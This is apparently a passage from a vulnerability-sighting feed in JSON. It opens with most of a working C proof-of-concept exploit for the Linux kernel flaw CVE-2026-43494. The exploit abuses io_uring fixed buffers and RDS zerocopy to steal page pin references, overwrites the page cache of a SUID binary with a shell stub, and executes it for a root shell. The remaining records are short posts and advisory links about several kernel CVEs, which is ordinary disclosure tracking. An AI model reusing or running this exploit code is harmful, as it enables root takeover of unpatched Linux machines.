open(\"/dev/null\", O_RDONLY);\n    open(\"/dev/null\", O_WRONLY);\n    open(\"/dev/null\", O_WRONLY);\n    execl(\"/bin/sleep\", \"sleep\", \"99999\", (char *)NULL);\n    _exit(0);\n}\n\nstatic int uring_submit_read_fixed(struct uring *r, int file_fd, void *buf, uint32_t len) {\n    uint32_t tail = *r-&gt;sq_tail;\n    uint32_t idx = tail &amp; *r-&gt;sq_mask;\n\n    struct io_uring_sqe *sqe = &amp;r-&gt;sqes[idx];\n    memset(sqe, 0, sizeof(*sqe));\n    sqe-&gt;opcode = IORING_OP_READ_FIXED;\n    sqe-&gt;fd = file_fd;\n    sqe-&gt;off = 0;\n    sqe-&gt;addr = (uint64_t)(unsigned long)buf;\n    sqe-&gt;len = len;\n    sqe-&gt;buf_index = 0;\n\n    r-&gt;sq_array[idx] = idx;\n    __atomic_store_n(r-&gt;sq_tail, tail + 1, __ATOMIC_RELEASE);\n\n    int ret = syscall(__NR_io_uring_enter, r-&gt;fd, 1, 1,\n                      IORING_ENTER_GETEVENTS, NULL, 0);\n    if (ret &lt; 0) {\n        ERR(\"io_uring_enter: %s\", strerror(errno));\n        return -1;\n    }\n    return 0;\n}\n\nstatic int uring_wait_cqe(struct uring *r, int32_t *res_out) {\n    uint32_t head = *r-&gt;cq_head;\n    uint32_t tail;\n\n    for (int i = 0; i &lt; 1000; i++) {\n        tail = __atomic_load_n(r-&gt;cq_tail, __ATOMIC_ACQUIRE);\n        if (head != tail) break;\n        usleep(1000);\n    }\n    tail = __atomic_load_n(r-&gt;cq_tail, __ATOMIC_ACQUIRE);\n    if (head == tail) {\n        ERR(\"CQ timeout \u2014 no completion\");\n        return -1;\n    }\n\n    uint32_t idx = head &amp; *r-&gt;cq_mask;\n    if (res_out) *res_out = r-&gt;cqes[idx].res;\n    __atomic_store_n(r-&gt;cq_head, head + 1, __ATOMIC_RELEASE);\n    return 0;\n}\n\nstatic void uring_destroy(struct uring *r) {\n    if (r-&gt;sq_ring &amp;&amp; r-&gt;sq_ring != MAP_FAILED) munmap(r-&gt;sq_ring, r-&gt;sq_ring_sz);\n    if (r-&gt;cq_ring &amp;&amp; r-&gt;cq_ring != MAP_FAILED) munmap(r-&gt;cq_ring, r-&gt;cq_ring_sz);\n    if (r-&gt;sqes &amp;&amp; r-&gt;sqes != MAP_FAILED) munmap(r-&gt;sqes, r-&gt;sqes_sz);\n    if (r-&gt;fd &gt;= 0) close(r-&gt;fd);\n    memset(r, 0, sizeof(*r));\n    r-&gt;fd = -1;\n    r-&gt;sq_ring = r-&gt;cq_ring = MAP_FAILED;\n    r-&gt;sqes = MAP_FAILED;\n}\n\nstatic int create_payload_file(void) {\n    char path[] = \"/tmp/.payload_XXXXXX\";\n    int fd = mkstemp(path);\n    if (fd &lt; 0) {\n        ERR(\"mkstemp: %s\", strerror(errno));\n        return -1;\n    }\n    unlink(path);\n\n    uint8_t page[PAGE_SIZE];\n    memset(page, 0, sizeof(page));\n    memcpy(page, SHELL_ELF, sizeof(SHELL_ELF));\n\n    if (write(fd, page, PAGE_SIZE) != PAGE_SIZE) {\n        ERR(\"write payload: %s\", strerror(errno));\n        close(fd);\n        return -1;\n    }\n    return fd;\n}\n\nstatic int evict_page_cache(const char *path) {\n    int fd = open(path, O_RDONLY);\n    if (fd &lt; 0) {\n        ERR(\"fadvise open: %s\", strerror(errno));\n        return -1;\n    }\n    if (posix_fadvise(fd, 0, PAGE_SIZE, POSIX_FADV_DONTNEED) &lt; 0) {\n        ERR(\"posix_fadvise: %s\", strerror(errno));\n        close(fd);\n        return -1;\n    }\n    close(fd);\n    return 0;\n}\n\nstatic int attempt_exploit(const char *target, pid_t *daemon_out, int show_phases) {\n    if (show_phases)\n        ui_phase(\"Memory &amp; io_uring setup\");\n\n    void *buf = mmap(NULL, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE,\n                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n    if (buf == MAP_FAILED) {\n        ERR(\"mmap buf: %s\", strerror(errno));\n        return -1;\n    }\n    memset(buf, 0, PAGE_SIZE);\n\n    if (mprotect((char *)buf + PAGE_SIZE, PAGE_SIZE, PROT_NONE) &lt; 0) {\n        ERR(\"mprotect guard: %s\", strerror(errno));\n        munmap(buf, 2 * PAGE_SIZE);\n        return -1;\n    }\n\n    char addr_buf[32];\n    snprintf(addr_buf, sizeof(addr_buf), \"%p\", buf);\n    ui_stat_box(\"Pinned page\", addr_buf, ANSI_MAGENTA);\n    OK(\"2-page mapping + PROT_NONE guard @ %p\", (char *)buf + PAGE_SIZE);\n\n    struct uring ring, ring2;\n    memset(&amp;ring, 0, sizeof(ring));\n    memset(&amp;ring2, 0, sizeof(ring2));\n    ring.fd = ring2.fd = -1;\n    ring.sq_ring = ring.cq_ring = ring.sqes = MAP_FAILED;\n    ring2.sq_ring = ring2.cq_ring = ring2.sqes = MAP_FAILED;\n\n    if (uring_setup(&amp;ring, 4) &lt; 0) goto fail_buf;\n    if (uring_register_buffers(&amp;ring, buf, PAGE_SIZE) &lt; 0) goto fail_ring;\n    OK(\"Ring-1 buffer registered (FOLL_PIN +%d)\", GUP_PIN_COUNTING_BIAS);\n\n    if (uring_setup(&amp;ring2, 1) &lt; 0) goto fail_ring;\n    if (uring_clone_buffers(&amp;ring2, &amp;ring) &lt; 0) goto fail_ring2;\n    OK(\"Ring-2 cloned buffer table (imu-&gt;refs = 2)\");\n\n    pid_t daemon = spawn_ring_holder(ring2.fd);\n    if (daemon &lt; 0) {\n        ERR(\"fork daemon: %s\", strerror(errno));\n        goto fail_ring2;\n    }\n    uring_destroy(&amp;ring2);\n    char pid_buf[16];\n    snprintf(pid_buf, sizeof(pid_buf), \"%d\", (int)daemon);\n    ui_stat_box(\"Ring holder\", pid_buf, ANSI_CYAN);\n    OK(\"Daemon holds ring2 fd (blocks unpin on cleanup)\");\n    *daemon_out = daemon;\n\n    if (show_phases)\n        ui_phase(\"Pin reference theft (RDS zerocopy)\");\n\n    LOG(\"Stealing %d pin refs via RDS zerocopy...\", GUP_PIN_COUNTING_BIAS);\n    int stolen = 0;\n    for (int i = 0; i &lt; GUP_PIN_COUNTING_BIAS; i++) {\n        if (steal_one_ref(buf, PORT_BASE + i * 2) == 0)\n            stolen++;\n        if ((i &amp; 31) == 0 || i == GUP_PIN_COUNTING_BIAS - 1)\n            ui_progress(i + 1, GUP_PIN_COUNTING_BIAS);\n    }\n    OK(\"Stole %d/%d references\", stolen, GUP_PIN_COUNTING_BIAS);\n    if (stolen &lt; GUP_PIN_COUNTING_BIAS - 10) {\n        ERR(\"Too few stolen refs (%d) \u2014 RDS may be unavailable\", stolen);\n        goto fail_ring;\n    }\n\n    if (show_phases)\n        ui_phase(\"Page cache overwrite &amp; privesc\");\n\n    LOG(\"Evicting page 0 of %s from page cache\", target);\n    if (evict_page_cache(target) &lt; 0) goto fail_ring;\n    OK(\"Page cache evicted\");\n\n    LOG(\"Draining PCP (256 populate mmaps)...\");\n    void *drain[256];\n    for (int i = 0; i &lt; 256; i++) {\n        drain[i] = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,\n                        MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);\n    }\n    OK(\"PCP drain complete\");\n\n    LOG(\"munmap pinned page \u2192 free to PCP top\");\n    if (munmap(buf, PAGE_SIZE) &lt; 0) {\n        ERR(\"munmap: %s\", strerror(errno));\n        for (int i = 0; i &lt; 256; i++)\n            if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n        goto fail_ring;\n    }\n    OK(\"Page freed \u2014 io_uring retains dangling struct page*\");\n\n    LOG(\"pread %s \u2192 reclaim freed frame as page cache\", target);\n    int tfd = open(target, O_RDONLY);\n    if (tfd &lt; 0) {\n        ERR(\"open target: %s\", strerror(errno));\n        for (int i = 0; i &lt; 256; i++)\n            if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n        goto fail_ring;\n    }\n    uint8_t scratch[PAGE_SIZE];\n    if (pread(tfd, scratch, PAGE_SIZE, 0) &lt; 0) {\n        ERR(\"pread: %s\", strerror(errno));\n        close(tfd);\n        for (int i = 0; i &lt; 256; i++)\n            if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n        goto fail_ring;\n    }\n    close(tfd);\n    OK(\"Page cache populated at reclaimed frame\");\n\n    for (int i = 0; i &lt; 256; i++)\n        if (drain[i] != MAP_FAILED) munmap(drain[i], PAGE_SIZE);\n\n    int payload_fd = create_payload_file();\n    if (payload_fd &lt; 0) goto fail_ring;\n    OK(\"Payload file ready (%zu byte ELF stub)\", sizeof(SHELL_ELF));\n\n    LOG(\"IORING_OP_READ_FIXED \u2192 DMA overwrite page cache via dangling page\");\n    if (uring_submit_read_fixed(&amp;ring, payload_fd, buf, PAGE_SIZE) &lt; 0) {\n        close(payload_fd);\n        goto fail_ring;\n    }\n\n    int32_t cqe_res;\n    if (uring_wait_cqe(&amp;ring, &amp;cqe_res) &lt; 0) {\n        close(payload_fd);\n        goto fail_ring;\n    }\n    close(payload_fd);\n\n    if (cqe_res &lt; 0) {\n        ERR(\"READ_FIXED CQE: %d (%s)\", cqe_res, strerror(-cqe_res));\n        goto fail_ring;\n    }\n    OK(\"DMA write complete (%d bytes)\", cqe_res);\n\n    tfd = open(target, O_RDONLY);\n    if (tfd &lt; 0) {\n        ERR(\"verify open: %s\", strerror(errno));\n        goto fail_ring;\n    }\n    uint8_t check[sizeof(SHELL_ELF)];\n    if (pread(tfd, check, sizeof(check), 0) != (ssize_t)sizeof(check)) {\n        ERR(\"verify pread: %s\", strerror(errno));\n        close(tfd);\n        goto fail_ring;\n    }\n    close(tfd);\n\n    if (memcmp(check, SHELL_ELF, sizeof(SHELL_ELF)) != 0) {\n        ERR(\"Verification failed \u2014 page cache not overwritten (race lost?)\");\n        goto fail_ring;\n    }\n    OK(\"Verified: page 0 matches SHELL_ELF stub\");\n\n    uring_destroy(&amp;ring);\n    munmap((char *)buf + PAGE_SIZE, PAGE_SIZE);\n\n    ui_footer(1);\n    LOG(\"Executing %s (injected stub \u2192 /bin/sh as root)\", target);\n    {\n        const char *bn = strrchr(target, '/');\n        bn = bn ? bn + 1 : target;\n        fprintf(stderr,\n            ANSI_YELLOW \"  \u25c7 Restore: cp /tmp/.backup_%s_%d %s &amp;&amp; chmod u+s %s\\n\" ANSI_RESET,\n            bn, getpid(), target, target);\n    }\n    for (int fd = 3; fd &lt; 1024; fd++) close(fd);\n    execl(target, target, (char *)NULL);\n    ERR(\"execl: %s\", strerror(errno));\n    return -1;\n\nfail_ring2:\n    uring_destroy(&amp;ring2);\nfail_ring:\n    uring_destroy(&amp;ring);\nfail_buf:\n    if (buf != MAP_FAILED) munmap(buf, 2 * PAGE_SIZE);\n    return -1;\n}\n\nint main(void) {\n    ui_banner();\n    pin_cpu(0);\n\n    ui_phase(\"Reconnaissance\");\n    LOG(\"Affinity locked to CPU 0\");\n    ui_stat_box(\"CPU pin\", \"cpu0\", ANSI_CYAN);\n\n    const char *target = find_suid_target();\n    if (!target) {\n        ERR(\"No SUID binary found\");\n        ui_footer(0);\n        return 1;\n    }\n    ui_stat_box(\"SUID target\", target, ANSI_YELLOW);\n\n    if (backup_target(target) &lt; 0) {\n        ERR(\"Backup failed \u2014 aborting for safety\");\n        ui_footer(0);\n        return 1;\n    }\n\n    pid_t daemons[MAX_RETRIES];\n    int ndaemons = 0;\n\n    for (int attempt = 0; attempt &lt; MAX_RETRIES; attempt++) {\n        if (attempt &gt; 0) {\n            fprintf(stderr, \"\\n\");\n            LOG(\"Retry attempt %d/%d\", attempt + 1, MAX_RETRIES);\n        }\n\n        pid_t daemon = 0;\n        int ret = attempt_exploit(target, &amp;daemon, attempt == 0);\n        if (daemon &gt; 0)\n            daemons[ndaemons++] = daemon;\n        if (ret == 0)\n            return 0;\n        if (attempt &lt; MAX_RETRIES - 1) {\n            ERR(\"Attempt %d failed\", attempt + 1);\n            sleep(1);\n        }\n    }\n\n    for (int i = 0; i &lt; ndaemons; i++) {\n        kill(daemons[i], SIGKILL);\n        waitpid(daemons[i], NULL, 0);\n    }\n    ui_footer(0);\n    ERR(\"All %d attempts failed \u2014 kernel may be patched or RDS/io_uring unavailable\", MAX_RETRIES);\n    return 1;\n}", "creation_timestamp": "2026-05-26T12:09:45.000000Z"}, {"uuid": "e0d5889b-b40f-4604-ba85-f44a84304ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mmyrdb3ep623", "content": "\ud83d\udd17 CVE : CVE-2026-23171, CVE-2026-43494, CVE-2026-43503, CVE-2026-46174, CVE-2026-46300", "creation_timestamp": "2026-05-29T14:40:12.485170Z"}, {"uuid": "4d2d220d-1691-4be2-accc-2e97c908bec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://t.me/GithubRedTeam/86529", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-43494-PinTheft-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a letsr00t\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-30 11:45:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-30T12:00:06.000000Z"}, {"uuid": "084c9ea3-69c8-4768-bcc0-d1f588582a84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260601", "content": "", "creation_timestamp": "2026-05-31T20:00:00.000000Z"}, {"uuid": "8999306d-ec91-43bb-9638-01c1e0ae38a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/keiwork35.bsky.social/post/3mn7wluuozh2t", "content": "\u3010\u7dca\u6025\u3011CVE-2026-43493 \uff08\u88fd\u54c1\u540d\u30fb\u30d0\u30fc\u30b8\u30e7\u30f3\uff09\u306b\u6df1\u523b\u306a\u8106\u5f31\u6027\uff5c\u5373\u6642\u5bfe\u5fdc\u304c\u5fc5\u8981\n\n\u3053\u306e\u8106\u5f31\u6027\u306f\u3001Linux\u30ab\u30fc\u30cd\u30eb\u306b\u304a\u3051\u308bMAY_BACKLOG\u30ea\u30af\u30a8\u30b9\u30c8\u306e\u51e6\u7406\u306b\u95a2\u3059\u308b\u554f\u984c\u3067\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001EBUSY\u304c\u8fd4\u3055\u308c\u308b\u5834\u5408\u304c\u3042\u308a\u3001\u305d\u306e\u5024\u3092\u78ba\u8a8d\u3057\u3066EINPROGRESS\u901a\u77e5\u3092\u30d5\u30a3\u30eb\u30bf\u30ea\u30f3\u30b0\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002", "creation_timestamp": "2026-06-01T11:03:08.546203Z"}, {"uuid": "183a0848-b348-4637-858b-792b18456d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "Telegram/cXofYTKCEb7MAqpqCLq9-4nZzN6JY2AAp_zXbpQr5zG2YYk", "content": "", "creation_timestamp": "2026-05-30T15:00:16.000000Z"}, {"uuid": "88a0370d-0e49-4e8b-adb6-a1b8a7eada88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "Telegram/5hgQ8AKXX2p6Xv_JteDWfDLu6UEUErMaTbIKv1z5cXU-g7Q", "content": "", "creation_timestamp": "2026-05-28T15:00:08.000000Z"}, {"uuid": "72f9b760-9e8d-46d4-b459-41d6155ee9eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63qtduk2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.134208Z"}, {"uuid": "3cdf43c3-0c50-4ef9-9316-cc003ccca7b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63qtduk2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.272006Z"}, {"uuid": "8e54a7cb-0fe9-4a86-8b69-d46f8618d99c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63tbews2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.790264Z"}, {"uuid": "af6c60e5-a92d-4df2-a031-1d772eb6984c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn63tbews2c", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:22:00.959819Z"}, {"uuid": "7366849f-428d-4b19-80f1-9f0dbd57ecef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn6774pd22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:55.350745Z"}, {"uuid": "ce9feec7-b506-4bc6-8bf5-a36dbe9c14d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn6774pd22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:55.615338Z"}, {"uuid": "33dc3a06-d5cd-437c-81f1-300923367436", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn67bdix22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:59.471916Z"}, {"uuid": "1b202187-a3c7-4b70-a2d7-d36ed60746cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mnn67bdix22b", "content": "\ud83d\udd12 Vulnerabilidades cr\u00edticas no kernel do Linux afetam o #Mageia 9 (CVE-2026-43491 a CVE-2026-43493).  Saiba mais: -&gt;  tinyurl.com/4xcxvrw8", "creation_timestamp": "2026-06-06T17:23:59.772793Z"}, {"uuid": "43ad0222-865a-444a-b280-2917acabcf3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260602", "content": "", "creation_timestamp": "2026-06-01T18:00:00.000000Z"}, {"uuid": "90c3663b-c9a3-4cc1-bdaf-92b14434ddf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://bsky.app/profile/canartuc.com/post/3monz2ua4ak27", "content": "A newly reported Linux kernel flaw, CVE-2026-43495, is a slab out-of-bounds read in the MediaTek t7xx WWAN driver: a crafted modem payload can read roughly 262 KB beyond the buffer. The reporter lists v5.18-rc1 through mainline and claims CVSS 8.8. Who audits cellular-modem drivers?\n\n#kernel", "creation_timestamp": "2026-06-19T18:49:46.610970Z"}, {"uuid": "43031916-5f61-4b0b-80c2-57122e15714b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-174-06", "content": "", "creation_timestamp": "2026-06-23T05:00:00.000000Z"}, {"uuid": "fbdb286e-e9cd-48e7-838f-b79d76909071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mp34sefn7q2s", "content": "MediaTek t7xx WWAN Flaw Exposes Kernel Memory\u2014Why Your 5G Laptop Is at Risk +\u00a0Video\n\nIntroduction: A recently disclosed high-severity vulnerability in the MediaTek t7xx 5G WWAN modem driver (CVE-2026-43495) has exposed a critical trust boundary flaw in the Linux kernel. The flaw allows a malicious\u2026", "creation_timestamp": "2026-06-25T00:01:12.638209Z"}, {"uuid": "eceb8e17-7979-4d79-981d-fc4c80affb75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260702", "content": "", "creation_timestamp": "2026-07-02T06:19:31.239852Z"}, {"uuid": "6586c779-3dd3-4f2d-b4c6-3a6d9360c0a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260702", "content": "", "creation_timestamp": "2026-07-02T06:19:35.570523Z"}, {"uuid": "fa2332f4-572d-4565-904b-b3157604fdbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260702", "content": "", "creation_timestamp": "2026-07-02T06:19:33.400835Z"}, {"uuid": "f16bfe3f-5e3e-417f-a7b0-62ec17323479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/ubuntu-linux-kernel-multiple-vulnerabilities_20260702", "content": "", "creation_timestamp": "2026-07-02T06:19:37.934506Z"}, {"uuid": "6a3d589f-a093-4601-b85f-f13a5ec79004", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43491", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/suse-linux-kernel-multiple-vulnerabilities_20260702", "content": "", "creation_timestamp": "2026-07-02T07:17:18.009493Z"}, {"uuid": "a9fcb8c4-74dc-4901-9c45-3252cb8cd52b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43492", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T05:55:36.597749Z"}, {"uuid": "a9929f5d-5686-4999-b8d9-54acd480a3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43493", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T05:55:40.769431Z"}, {"uuid": "dc65f96c-ca2d-4523-acd6-83f98d0ecb2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43494", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T05:55:43.117026Z"}, {"uuid": "be377482-738f-4a2b-bdfe-8b4ddeb70751", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43496", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T06:15:03.976908Z"}, {"uuid": "b857f100-3b32-4fc7-9b07-953790a8f75c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43497", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T06:15:06.712828Z"}, {"uuid": "3610cbf7-e9ea-4ca7-b47a-50ebeba71c47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T06:15:09.707057Z"}, {"uuid": "26188c4a-5cea-45b4-8396-c0e55abef8b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-43495", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/debian-linux-kernel-multiple-vulnerabilities_20260706", "content": "", "creation_timestamp": "2026-07-06T06:25:06.377569Z"}, {"uuid": "bc6bfd9c-f537-4037-9e90-ebef196fe0e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-43499", "type": "seen", "source": "https://bsky.app/profile/securityonline.bsky.social/post/3mq42deor742i", "content": "Researchers disclosed GhostLock (CVE-2026-43499) with public PoC code. The 15-year Linux kernel bug enables privilege escalation and container escape.\n\n#GhostLock #CVE202643499 #LinuxKernel #PrivilegeEscalation #ContainerEscape #InfoSec", "creation_timestamp": "2026-07-08T02:14:54.336844Z"}, 